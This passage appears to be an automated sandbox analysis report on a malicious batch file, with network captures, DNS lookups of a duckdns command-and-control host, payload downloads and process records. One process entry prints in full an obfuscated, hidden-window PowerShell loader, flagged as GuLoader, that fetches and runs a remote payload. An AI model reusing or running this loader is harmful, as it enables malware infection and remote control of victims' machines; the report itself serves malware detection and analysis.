                                                                                                    Oct 23, 2024 17:25:29.080939054 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.080948114 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.080957890 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.080961943 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.081032038 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.081041098 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.081049919 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.081070900 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.081079960 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.081089973 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.081099987 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.081109047 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.082791090 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.082803011 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.082874060 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.083198071 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.153848886 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:29.171164989 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:29.173142910 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:29.175323009 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:29.176709890 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176734924 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176745892 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176758051 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176826954 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176837921 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176848888 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176942110 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176951885 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176961899 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176973104 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.176981926 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.177037001 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.177320004 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.177506924 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:29.178694010 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.178704977 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.178761959 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.178781033 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.178791046 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.178831100 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.178883076 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.178891897 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.179059029 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:29.181200981 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.182903051 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.182981968 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.182991982 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.183063984 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.183140039 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.183231115 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.183239937 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.184535980 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.184701920 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.185398102 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.310348034 CEST4997853848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:29.315866947 CEST5384849978193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.693959951 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.747625113 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:29.749301910 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:29.753164053 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753187895 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753242016 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753349066 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753359079 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753367901 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753379107 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753388882 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753468037 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753479958 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753494024 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753503084 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753540039 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753593922 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.754698038 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.754709005 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.754740000 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.754750967 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.754868031 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.754949093 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.925220966 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.966327906 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:30.029232025 CEST4997853848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:30.034811974 CEST5384849978193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.047544956 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:30.049827099 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:30.052081108 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:30.053040028 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.053112984 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.053123951 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.053134918 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.053208113 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.053217888 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.053230047 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.053299904 CEST5384849980193.187.91.212192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 23, 2024 17:22:36.728585005 CEST | 192.168.2.9 | 1.1.1.1 | 0x7552 | Standard query (0) | ethys.ro | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:16.998564959 CEST | 192.168.2.9 | 1.1.1.1 | 0xd738 | Standard query (0) | rj0987654321.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:17.997502089 CEST | 192.168.2.9 | 1.1.1.1 | 0xd738 | Standard query (0) | rj0987654321.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:19.013212919 CEST | 192.168.2.9 | 1.1.1.1 | 0xd738 | Standard query (0) | rj0987654321.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:21.013242006 CEST | 192.168.2.9 | 1.1.1.1 | 0xd738 | Standard query (0) | rj0987654321.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:22.330626965 CEST | 192.168.2.9 | 1.1.1.1 | 0x7fb8 | Standard query (0) | rj0987654321.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:23.341547966 CEST | 192.168.2.9 | 1.1.1.1 | 0x7fb8 | Standard query (0) | rj0987654321.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:24.341409922 CEST | 192.168.2.9 | 1.1.1.1 | 0x7fb8 | Standard query (0) | rj0987654321.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:26.344558954 CEST | 192.168.2.9 | 1.1.1.1 | 0x7fb8 | Standard query (0) | rj0987654321.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:28.572922945 CEST | 192.168.2.9 | 1.1.1.1 | 0x374 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 23, 2024 17:22:29.856857061 CEST | 1.1.1.1 | 192.168.2.9 | 0x2563 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | azurefd-t-fb-prod.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 23, 2024 17:22:29.856857061 CEST | 1.1.1.1 | 192.168.2.9 | 0x2563 | No error (0) | dual.s-part-0017.t-0009.fb-t-msedge.net | s-part-0017.t-0009.fb-t-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 23, 2024 17:22:29.856857061 CEST | 1.1.1.1 | 192.168.2.9 | 0x2563 | No error (0) | s-part-0017.t-0009.fb-t-msedge.net |  | 13.107.253.45 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:22:36.782126904 CEST | 1.1.1.1 | 192.168.2.9 | 0x7552 | No error (0) | ethys.ro |  | 81.180.144.124 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:21.310065985 CEST | 1.1.1.1 | 192.168.2.9 | 0xd738 | Server failure (2) | rj0987654321.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:21.310081005 CEST | 1.1.1.1 | 192.168.2.9 | 0xd738 | Server failure (2) | rj0987654321.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:21.310091019 CEST | 1.1.1.1 | 192.168.2.9 | 0xd738 | Server failure (2) | rj0987654321.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:21.314465046 CEST | 1.1.1.1 | 192.168.2.9 | 0xd738 | Server failure (2) | rj0987654321.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:26.439071894 CEST | 1.1.1.1 | 192.168.2.9 | 0x7fb8 | No error (0) | rj0987654321.duckdns.org |  | 193.187.91.212 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:26.439085960 CEST | 1.1.1.1 | 192.168.2.9 | 0x7fb8 | No error (0) | rj0987654321.duckdns.org |  | 193.187.91.212 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:26.439100981 CEST | 1.1.1.1 | 192.168.2.9 | 0x7fb8 | No error (0) | rj0987654321.duckdns.org |  | 193.187.91.212 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:26.439110994 CEST | 1.1.1.1 | 192.168.2.9 | 0x7fb8 | No error (0) | rj0987654321.duckdns.org |  | 193.187.91.212 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:28.581649065 CEST | 1.1.1.1 | 192.168.2.9 | 0x374 | No error (0) | geoplugin.net |  | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49977 | 178.237.33.50 | 80 | 7800 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 17:23:28.587980032 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Oct 23, 2024 17:23:29.437005043 CEST | 1165 | IN | HTTP/1.1 200 OK
date: Wed, 23 Oct 2024 15:23:29 GMT
server: Apache
content-length: 957
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
                                                                                                    Data Ascii: { "geoplugin_request":"173.254.250.90", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    0192.168.2.94973781.180.144.1244437344C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    2024-10-23 15:22:37 UTC | 168 | OUT | GET /Nonaddicting.qxd HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                    Host: ethys.ro
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-10-23 15:22:37 UTC | 413 | IN | HTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    content-type: application/vnd.quark.quarkxpress
                                                                                                    last-modified: Wed, 23 Oct 2024 09:06:27 GMT
                                                                                                    accept-ranges: bytes
                                                                                                    content-length: 467200
                                                                                                    date: Wed, 23 Oct 2024 15:22:37 GMT
                                                                                                    server: LiteSpeed
                                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    1192.168.2.94992581.180.144.1244437800C:\Windows\SysWOW64\msiexec.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    2024-10-23 15:23:14 UTC | 168 | OUT | GET /3/tVWTkim99.bin HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                    Host: ethys.ro
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-10-23 15:23:14 UTC | 404 | IN | HTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    content-type: application/octet-stream
                                                                                                    last-modified: Wed, 23 Oct 2024 09:02:09 GMT
                                                                                                    accept-ranges: bytes
                                                                                                    content-length: 494656
                                                                                                    date: Wed, 23 Oct 2024 15:23:14 GMT
                                                                                                    server: LiteSpeed
                                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"



                                                                                                    Target ID:0
                                                                                                    Start time:11:22:32
                                                                                                    Start date:23/10/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ZW_PCCE-010023024001.bat" "
                                                                                                    Imagebase:0x7ff716cb0000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:1
                                                                                                    Start time:11:22:32
                                                                                                    Start date:23/10/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff70f010000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:3
                                                                                                    Start time:11:22:32
                                                                                                    Start date:23/10/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:powershell.exe -windowstyle hidden " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. 
agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Meta$D,kaTAcc a Abea C sg aanKendg HeteM sqrsmaleSeedsFosi ');$Grasshopper=viruserne 'Stee$,ommfTrotoNon rg nbwKvalaScotrRdhudUsheeSlamr.outs Une.D sbDS,oroGenfwC nfnAntil,fteoCoc.a SttdCow FBesti Baal rugeK.ok(Drug$AntoNPangeBehauIndukVigt, yk$BedvUUdr nP aspPredrPassoEutanTopfoR.abuEnvynEtagcMe oiLog.nUmodgL,ma)Bard ';$Unpronouncing=$Superdural;Vvningens (viruserne 'Maju$ UhaGMultLJugaoP.enb BhmARedeLschl:monafForbOStorLAndeEPr lnS,mmdTadpETri sFa.b=Util( MinTpur.eMarkspresTPinl-Kr nPHaveaKurvtGlasHCebu Mult$SonnUNonvNSam,PP rsrKu doAarsN ,doO UnfUPapanRaggcImplIComiNErklgMand)Undi ');while (!$Folendes) {Vvningens (viruserne 'S.ne$JerngFilmlOpgaoEjsab joka Lnnl Unh: SpuPMa,erKliteLadipRansa StyrCamoeIn tdGent=Porp$Trafttr.kr ForuSubsetetr ') ;Vvningens $Grasshopper;Vvningens (viruserne ' amfsSquiTO.eraCincRIffitBo g- EliS EgnlInv,EspalEabscpLers Ep.s4Arg. 
');Vvningens (viruserne 'bygg$ S vgContLE suOVedfBSc lA icol Leg:JoblFSolboLoyaLForbE L knTrandGyroEUnsesSmed=Ni.r( ,rgtG steChrosInteTHerb- AbsP Tobakartt egeh nmo Arc$Shawu,ejlnArbepInv RAcetoTrevnU saO ur,UfolkNFormCSunli.pronHypeGHype) Haa ') ;Vvningens (viruserne 'Over$pipegSemilGrimOP,eubGingABoutLFors:AyahCC.plOM.ssmUntreUnsclVe dITeloEInjusa meT Pyg=Barf$SkycGLovblorpiogigaB Dama MunLPenn:frembE ideGe tmVninE OpseBrygT Uns+ Skr+Und %Unsu$cultMf jloUnb.STorpa imeiSpanKActuK SecE .lirAnemNSkruEEmer.Te rCDyreO indu AksNMicrT en ') ;$Neuk=$mosaikkerne[$Comeliest];}$Forvrrelser=319177;$synclastic=31223;Vvningens (viruserne 'Sk l$ ootgExcyl omsoS ilbSupeaPertL.ern:LimpKPr.doTrouMNrinMPolyEScopNHeretChapeSe,vRDri EKe,uNW.ipdDub E F rSSvmm Dksl= Kla epidgUncaEEx,itKrse- Kupc ArcOD sinUs,utMurbEOmhunK ontSko. Forh$S igUBillNTes,PHomerBekoo Swan SulOIwarU,entNCounCC vii Komnh stg Bkk ');Vvningens (viruserne ' en$ MalgTreflSkaloSh rbVanda ovel jou:Mrk fStila SvilEncld.elseColor elaeFan b ibsGru t Perr nona rnrplebbpForgeMavesRawl Pro,= ubr Sho[ConvS,arbyInexsCompt InieN.rvm ir.GoneC L.mo ArbnfarmvShodeAnabrAsket Fac]Ra k: iff:TetrFDaasrWateoMes.mPlotBDefia MagsOvereCele6Gree4St,rSGun tT.rnrForfiNot nMantgPal (Brev$TachK G.eoPi pmInh m rabeOptin sv t.eboe RygrGallemarinLinjdVrikeHalvsrdde) nds ');Vvningens (viruserne 'Unde$ ownG urhL ForoAl,sbAutoaLyspLlakf: SetpSagsaSt uTAstme repNTovnTBorieC.ilR StuI.eerNCo ogSkr,el teR friNS alEshudSdeto Dato=Stic Rape[ omfsUnmaYKlimSDiopT.ffieFla.MDem .shoptLommeDobbxSyndtSizz. 
utaeSmrenIndiC FarObostDPibeI Prenchapgdyre]k mm: nin: aliaCladS TimCLeptICaprIF rb.RiddGFlorE,lketFredSIntetMat.RTemiIC,rynKlamGinve(Non,$ UnrfCoonAPostLSepaDUnpreSygdRMumme CarbEnqus svat Smar JenAKal PCyclpklunE rots Oks)Broa ');Vvningens (viruserne ' S l$Be.oGW.teLfsteoK,tyBFrieaMu,eLGr m: KrueS btU Bkbr FreyBeerA BrdlTa tePaaka,eboN N,u=s.aa$Corop BalaNidstSavle ,ejnMiniTCr nESalvROsmoipelonLoregMotoeTopur H,snPosteVa uS U o.Pasts,eopuCa ib AldSforhT O eRGranI jednSub,gBekn( und$LaboFOncioHonortrilVrespRj aprSundeFil.LCymbs UndENit Rlag ,Ditl$Afd sVedky BluNVe nCCon l innA CedSDe aTS,uliTilscP.zz) Is ');Vvningens $Euryalean;"
                                                                                                    Imagebase:0x7ff760310000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.1476663613.0000013F90071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:4
                                                                                                    Start time:11:22:32
                                                                                                    Start date:23/10/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff70f010000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:5
                                                                                                    Start time:11:22:41
                                                                                                    Start date:23/10/2024
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
